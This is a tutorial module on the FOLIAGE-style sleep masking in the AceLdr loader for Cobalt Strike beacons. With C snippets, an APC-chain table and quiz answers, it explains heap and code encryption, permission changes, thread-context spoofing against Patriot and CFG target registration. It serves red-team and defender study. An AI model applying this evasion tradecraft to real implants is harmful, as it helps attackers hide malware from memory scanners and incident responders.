Module 8: FOLIAGE Sleep Masking

Encrypting the beacon in memory while it sleeps — the crown jewel of AceLdr's evasion

Advanced

The Big Idea

Inspired by SecIdiot/FOLIAGE

AceLdr's sleep masking is inspired by the FOLIAGE project by SecIdiot. The core insight: Cobalt Strike beacons spend the vast majority of their lifecycle sleeping between check-ins. During sleep, the beacon's code and data sit in memory unencrypted, an easy target for memory scanners. FOLIAGE solves this by encrypting the beacon's heap and changing its memory permissions before sleeping, then reversing everything upon wakeup.

The challenge is that you can't simply encrypt yourself and then sleep — the code performing the encryption would also be encrypted. FOLIAGE's elegant solution uses Asynchronous Procedure Calls (APCs) queued to the current thread. The APCs execute in sequence when the thread enters an alertable wait state, performing all the masking operations without the beacon's own code needing to be executing.

Sleep_Hook — The Entry Point

When the beacon calls Sleep(dwMilliseconds), AceLdr's IAT hook intercepts it. The hook in hooks/delay.c first checks for short sleeps:

C — hooks/delay.c
VOID WINAPI Sleep_Hook(DWORD dwMilliseconds) {
    // Short sleep bypass: for sleeps under 1000ms, just call the
    // real Sleep directly. FOLIAGE overhead isn't worth it for
    // quick operational pauses (e.g., jitter calculations).
    if (dwMilliseconds < 1000) {
        STUB.Api.Sleep(dwMilliseconds);
        return;
    }

    // For real sleep intervals (>= 1 second):
    // 1. Generate a fresh RC4 encryption key
    // 2. Encrypt the entire private heap
    // 3. Queue the APC chain for sleep masking
    // 4. Enter alertable wait (APCs fire, thread sleeps)
    // 5. On wakeup: the APC chain decrypts the beacon code and
    //    restores its permissions and thread context
    // 6. Back in this hook: decrypt the private heap

    USTRING Key = { 0 };
    generateEncryptionKey(&Key);

    // Encrypt the private heap before sleeping
    encryptHeap(&Key);

    // Build and queue the APC chain, then sleep
    foliageSleep(dwMilliseconds, &Key);

    // After waking up, decrypt the heap
    encryptHeap(&Key);  // RC4 is symmetric: encrypt again = decrypt
}

The 1000ms Threshold

Short sleeps (under 1 second) bypass the entire FOLIAGE mechanism. This is a performance optimization. The beacon frequently uses short sleeps for jitter, retry logic, and internal timing. Running the full APC chain for every sub-second sleep would add significant overhead and produce suspicious patterns of APC queuing. Only the "real" sleep intervals between C2 check-ins trigger FOLIAGE.

generateEncryptionKey

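A fresh encryption key is generated for each sleep cycle. RC4 is a stream cipher, so reusing a key reuses the keystream: anyone holding two ciphertexts produced under the same key can XOR them together to cancel the keystream and recover the XOR of the two plaintexts. A per-cycle key avoids this: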

C — hooks/delay.c
VOID generateEncryptionKey(PUSTRING Key) {
    // Allocate a 16-byte key buffer
    Key->Length    = 16;
    Key->MaxLength = 16;
    Key->Buffer    = (PVOID)STUB.Api.HeapAlloc(
                        STUB.Heap, 0, Key->MaxLength);

    // Fill with random bytes using the system RNG
    STUB.Api.RtlGenRandom(Key->Buffer, Key->Length);
}

The key is a 16-byte random buffer used as the RC4 key for SystemFunction032. Using RtlGenRandom (the underlying function behind CryptGenRandom) ensures cryptographically strong randomness.
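The key-reuse concern can be illustrated with a small, portable sketch. It is not AceLdr code and does not call SystemFunction032; the function names, the fixed keystream bytes, and the sample plaintexts are all hypothetical stand-ins. It only shows the general stream-cipher property: when two buffers are XORed with the same keystream, XORing the two results cancels the keystream.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* XOR a buffer with a keystream in place. In a stream cipher such as RC4
 * the keystream is fully determined by the key, so reusing a key means
 * reusing the keystream. (Hypothetical helper, for illustration only.) */
static void xor_with_keystream(uint8_t *data, const uint8_t *keystream,
                               size_t len)
{
    assert(data != NULL && keystream != NULL);
    for (size_t i = 0; i < len; i++)
        data[i] ^= keystream[i];
}

/* Returns 1 if XORing two ciphertexts made with the same keystream equals
 * the XOR of the two plaintexts, i.e. the keystream has cancelled out. */
static int keystream_reuse_leaks(void)
{
    /* Arbitrary example bytes standing in for a cipher's keystream. */
    const uint8_t keystream[8] = { 0x3a, 0x91, 0x5c, 0x07,
                                   0xe2, 0x48, 0xbd, 0x66 };
    const uint8_t p1[8] = { 'c', 'y', 'c', 'l', 'e', '-', '0', '1' };
    const uint8_t p2[8] = { 'c', 'y', 'c', 'l', 'e', '-', '0', '2' };
    uint8_t c1[8], c2[8];

    for (size_t i = 0; i < 8; i++) {
        c1[i] = p1[i];
        c2[i] = p2[i];
    }
    xor_with_keystream(c1, keystream, 8);   /* "sleep cycle 1" */
    xor_with_keystream(c2, keystream, 8);   /* "sleep cycle 2", same key */

    for (size_t i = 0; i < 8; i++) {
        if ((c1[i] ^ c2[i]) != (p1[i] ^ p2[i]))
            return 0;
    }
    return 1;
}
```

Calling keystream_reuse_leaks() returns 1: the observer never needs the key to learn where the two plaintexts differ, which is the weakness a fresh per-cycle key is meant to avoid.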

encryptHeap — Walking and Encrypting

This function walks every allocated block on AceLdr's private heap and encrypts (or decrypts) it using RC4:

C — hooks/delay.c
VOID encryptHeap(PUSTRING Key) {
    PROCESS_HEAP_ENTRY Entry = { 0 };

    // Lock the heap to prevent concurrent access during encryption
    STUB.Api.RtlLockHeap(STUB.Heap);

    // Walk every block on the private heap
    while (STUB.Api.RtlWalkHeap(STUB.Heap, &Entry) == 0) {
        // Only encrypt BUSY (allocated) blocks
        if (Entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) {
            USTRING Data;
            Data.Length    = (USHORT)Entry.cbData;
            Data.MaxLength = (USHORT)Entry.cbData;
            Data.Buffer    = Entry.lpData;

            // SystemFunction032 = RC4 encrypt/decrypt
            // Since RC4 is symmetric, calling this twice with the
            // same key encrypts then decrypts (restoring plaintext)
            STUB.Api.SystemFunction032(&Data, Key);
        }
    }

    STUB.Api.RtlUnlockHeap(STUB.Heap);
}

Why RC4 via SystemFunction032?

SystemFunction032 — The Undocumented RC4

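SystemFunction032 is an undocumented function exported by advapi32.dll (implemented in cryptsp.dll). It implements the RC4 stream cipher. AceLdr uses it for both the heap encryption in encryptHeap and the beacon-code encryption in the APC chain; because it lives in a system DLL rather than in the beacon's own memory, it remains callable while the beacon itself is encrypted.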

RC4 Symmetry Property

RC4 is a stream cipher that generates a keystream from the key and XORs it with the data. Since XOR is its own inverse (A XOR K XOR K = A), calling SystemFunction032 twice with the same key first encrypts, then decrypts. This is why encryptHeap is called both before and after sleeping — the same function handles both directions.
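The symmetry can be checked with a textbook RC4 written in portable C. This is a sketch for illustration, not the SystemFunction032 implementation; rc4_crypt and rc4_selfcheck are hypothetical names. The self-check uses the widely published RC4 test vector (key "Key", plaintext "Plaintext") and then applies the cipher a second time to confirm the plaintext comes back.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Textbook RC4: key scheduling (KSA) followed by keystream generation
 * (PRGA). The data buffer is XORed with the keystream in place, so the
 * same call both encrypts and decrypts. */
static void rc4_crypt(const uint8_t *key, size_t key_len,
                      uint8_t *data, size_t data_len)
{
    uint8_t S[256];
    uint8_t j = 0;

    assert(key != NULL && key_len > 0);

    for (size_t i = 0; i < 256; i++)
        S[i] = (uint8_t)i;

    /* KSA: permute S using the key bytes. */
    for (size_t i = 0; i < 256; i++) {
        j = (uint8_t)(j + S[i] + key[i % key_len]);
        uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }

    /* PRGA: generate one keystream byte per data byte and XOR it in. */
    uint8_t a = 0, b = 0;
    for (size_t n = 0; n < data_len; n++) {
        a = (uint8_t)(a + 1);
        b = (uint8_t)(b + S[a]);
        uint8_t tmp = S[a]; S[a] = S[b]; S[b] = tmp;
        data[n] ^= S[(uint8_t)(S[a] + S[b])];
    }
}

/* Returns 1 if the first pass matches the published test vector and a
 * second pass with the same key restores the original plaintext. */
static int rc4_selfcheck(void)
{
    const uint8_t key[3] = { 'K', 'e', 'y' };
    const uint8_t plain[9] = { 'P', 'l', 'a', 'i', 'n', 't', 'e', 'x', 't' };
    const uint8_t expected[9] = { 0xBB, 0xF3, 0x16, 0xE8, 0xD9,
                                  0x40, 0xAF, 0x0A, 0xD3 };
    uint8_t buf[9];

    memcpy(buf, plain, sizeof buf);

    rc4_crypt(key, sizeof key, buf, sizeof buf);   /* first pass: encrypt */
    if (memcmp(buf, expected, sizeof buf) != 0)
        return 0;

    rc4_crypt(key, sizeof key, buf, sizeof buf);   /* second pass: decrypt */
    return memcmp(buf, plain, sizeof buf) == 0;
}
```

The second pass works only because each call rebuilds the RC4 state from the key, so both passes produce an identical keystream. The same condition applies to encryptHeap: the blocks must be visited with the same key and the same lengths on the way back.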

The 10-Step APC Chain

The heart of FOLIAGE is a chain of 10 APCs queued to the current thread. These APCs execute in FIFO (first-in, first-out) order when the thread enters an alertable wait state via NtWaitForSingleObject.

FOLIAGE APC Chain (APCs 0-9)

# | APC Function | Action | Purpose
0 | NtWaitForSingleObject | Wait (setup) | Initial wait before the masking steps run; the masked sleep itself is APC 5
1 | NtGetContextThread | Capture thread context (via trampoline) | Save RSP, RIP, etc. before masking; used for Patriot evasion
2 | NtSetContextThread | Set RIP to legitimate wait location | Make thread appear to be sleeping inside ntdll, not in beacon code
3 | NtProtectVirtualMemory | Change beacon memory to RW | Remove execute permission; beacon code becomes non-executable data
4 | SystemFunction032 | Encrypt beacon code with RC4 | Beacon code is now encrypted AND non-executable
5 | NtWaitForSingleObject | Wait on timer (sleep duration) | The actual sleep happens here with beacon fully masked
6 | SystemFunction032 | Decrypt beacon code with RC4 | Restore beacon code to plaintext
7 | NtProtectVirtualMemory | Change beacon memory back to RX | Restore execute permission so beacon can run again
8 | NtSetContextThread | Restore original thread context (via trampoline) | RIP points back to beacon code; used for Patriot evasion
9 | NtSetEvent | Signal completion event | Signals that the chain is complete so the outer wait can finish

Visualizing the Chain

APC Execution Flow

APC 0: Wait (setup)
APC 1: Get context
APC 2: Spoof context
APC 3: RX → RW
APC 4: Encrypt code
APC 5: SLEEP (masked)
APC 6: Decrypt code
APC 7: RW → RX
APC 8: Restore context
APC 9: Signal done
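The FIFO ordering the chain relies on can be modeled in plain C. The sketch below is a portable model only: it uses no Windows APIs, and every name in it (callback_queue, queue_push, queue_drain, record_step) is hypothetical. Ten numbered callbacks are queued, then drained in one pass that stands in for the alertable wait, and the recorded order is compared with the queue order.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_CALLBACKS 16

typedef void (*callback_fn)(void *arg);

/* A fixed-size FIFO of (function, argument) pairs. */
struct callback_queue {
    callback_fn fn[MAX_CALLBACKS];
    void       *arg[MAX_CALLBACKS];
    size_t      head;   /* next entry to run    */
    size_t      tail;   /* next free slot       */
};

/* Append a callback; returns 0 if the queue is full. */
static int queue_push(struct callback_queue *q, callback_fn fn, void *arg)
{
    assert(q != NULL && fn != NULL);
    if (q->tail == MAX_CALLBACKS)
        return 0;
    q->fn[q->tail]  = fn;
    q->arg[q->tail] = arg;
    q->tail++;
    return 1;
}

/* Stand-in for the alertable wait: run every pending callback in the
 * order it was queued. Returns the number of callbacks executed. */
static size_t queue_drain(struct callback_queue *q)
{
    size_t ran = 0;
    while (q->head < q->tail) {
        q->fn[q->head](q->arg[q->head]);
        q->head++;
        ran++;
    }
    return ran;
}

/* Execution trace written by the callbacks. */
static int    g_order[MAX_CALLBACKS];
static size_t g_count;

static void record_step(void *arg)
{
    g_order[g_count++] = *(int *)arg;
}

/* Returns 1 if ten queued steps run in exactly the order 0..9. */
static int fifo_order_ok(void)
{
    static int ids[10] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 };
    struct callback_queue q;

    q.head = 0;
    q.tail = 0;
    g_count = 0;

    for (int i = 0; i < 10; i++) {
        if (!queue_push(&q, record_step, &ids[i]))
            return 0;
    }
    if (queue_drain(&q) != 10)
        return 0;

    for (size_t i = 0; i < 10; i++) {
        if (g_order[i] != (int)i)
            return 0;
    }
    return 1;
}
```

The ordering guarantee is what lets each step assume the previous one has finished, for example that the permission change in step 3 is complete before the encryption in step 4 writes to the region.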

Why Use APCs Instead of Direct Calls?

The Self-Encryption Problem

Consider what happens if you try to encrypt yourself directly:

  1. You call SystemFunction032 to encrypt the beacon's memory region
  2. But the code calling SystemFunction032 is inside that memory region
  3. After encryption, the next instruction to execute is now encrypted garbage
  4. The program crashes

APCs solve this elegantly. All APC functions (NtProtectVirtualMemory, SystemFunction032, etc.) live in ntdll.dll or advapi32.dll, system DLLs that are NOT part of the beacon's memory. When the thread enters an alertable wait, the kernel delivers the queued user-mode APCs one at a time, in order, through ntdll's KiUserApcDispatcher. The beacon's own code never needs to execute during the masking process.

Patriot Evasion via JMP [RBX] Trampoline

The Patriot tool detects sleeping beacons by inspecting the thread's saved context (particularly RIP) to see if it points to suspicious memory. FOLIAGE counters this on APCs 1 and 8:

The Patriot Problem

When a thread sleeps, its context is saved. If a tool calls NtGetContextThread on a sleeping beacon thread, it sees that RIP points into unbacked memory — proof that the thread was executing beacon code. Even with the beacon encrypted, the saved context reveals its presence.

The Solution: Context Spoofing

APCs 1 and 8 in the chain handle this by using the JMP [RBX] trampoline (the same gadget from Module 7) as an intermediary for NtGetContextThread and NtSetContextThread:

Pseudocode — Patriot evasion
// APC 1: Capture context through trampoline
//   - NtGetContextThread is called through the JMP [RBX] gadget
//   - The captured context shows RIP at the gadget (in a legit DLL)
//   - This context is saved for later restoration

// APC 2: Set spoofed context
//   - NtSetContextThread sets RIP to point inside ntdll
//     (e.g., NtWaitForSingleObject + some offset)
//   - Now if Patriot inspects the thread during sleep,
//     RIP appears to be inside ntdll = legitimate

// APC 8: Restore original context through trampoline
//   - NtSetContextThread restores the saved context from APC 1
//   - RIP is set back to the beacon code, ready to resume

Thread Context During Sleep

Before Masking: RIP = beacon code (suspicious)
APCs 1-2: Save & spoof thread context
During Sleep: RIP = ntdll.dll (legitimate)
APC 8: Restore real context
After Wakeup: RIP = beacon code (running again)

CFG (Control Flow Guard) Handling

Windows Control Flow Guard (CFG) validates indirect call targets against a bitmap of approved addresses. Since APC dispatch involves indirect calls, AceLdr needs to register the address it queues as an APC target (its trampoline) as a valid CFG target:

C — cfg handling
// Before queuing APCs, register the trampoline as a valid
// CFG call target. Without this, a CFG-enforced process would
// be terminated when APC dispatch tries to call through
// an unregistered address.

PVOID  CfgAddr  = C_PTR(TrampolineFunc);
SIZE_T CfgSize  = sizeof(PVOID);

// NtSetInformationVirtualMemory with VmCfgCallTargetInformation
// adds our trampoline to the CFG bitmap
STUB.Api.NtSetInformationVirtualMemory(
    NtCurrentProcess(),
    VmCfgCallTargetInformation,
    1,
    &CfgAddr,
    &CfgInfo,
    sizeof(CfgInfo)
);

Why CFG Matters

Many modern processes run with CFG enabled. If AceLdr queues an APC whose target address isn't in the CFG bitmap, the APC dispatch will trigger a CFG violation — crashing the process. By calling NtSetInformationVirtualMemory with VmCfgCallTargetInformation, AceLdr adds its trampoline function as a valid call target, allowing the APC chain to execute without triggering CFG enforcement.

The Complete Sleep Cycle

Full FOLIAGE Sleep Sequence

  1. Beacon calls Sleep(60000)
  2. Sleep_Hook intercepts
  3. Generate RC4 key
  4. Encrypt private heap
  5. Queue 10 APCs
  6. Enter alertable wait
  7. APCs: mask code + spoof context
  8. SLEEP (fully masked)
  9. APCs: decrypt + restore
  10. Decrypt private heap
  11. Beacon resumes

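During the masked sleep window, a memory scanner sees an RC4-encrypted private heap, beacon code that is both encrypted and mapped RW rather than RX, and a thread whose RIP points into ntdll.dll.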

Knowledge Check

Module 8 Quiz

1. When does AceLdr encrypt the private heap relative to the APC chain?

The private heap is encrypted before the APC chain is queued, directly in Sleep_Hook via encryptHeap(&Key). The APC chain handles encrypting the beacon's code region (which is a separate concern). After wakeup, encryptHeap is called again with the same key to decrypt (RC4 symmetry).

2. Why can AceLdr use the same encryptHeap function for both encryption and decryption?

RC4 generates a keystream and XORs it with the data. Since XOR is self-inverse (A ^ K ^ K = A), applying RC4 twice with the same key first encrypts, then decrypts. This is why encryptHeap is called with the same key before sleep (encrypt) and after wakeup (decrypt).

3. What does the thread context look like to a scanner during the masked sleep?

APC 2 in the chain uses NtSetContextThread to set RIP to a location inside ntdll.dll (such as an offset within NtWaitForSingleObject). This makes the thread appear to be legitimately waiting inside a system call. Tools like Patriot that inspect sleeping thread contexts will see ntdll as the instruction pointer, not suspicious beacon memory.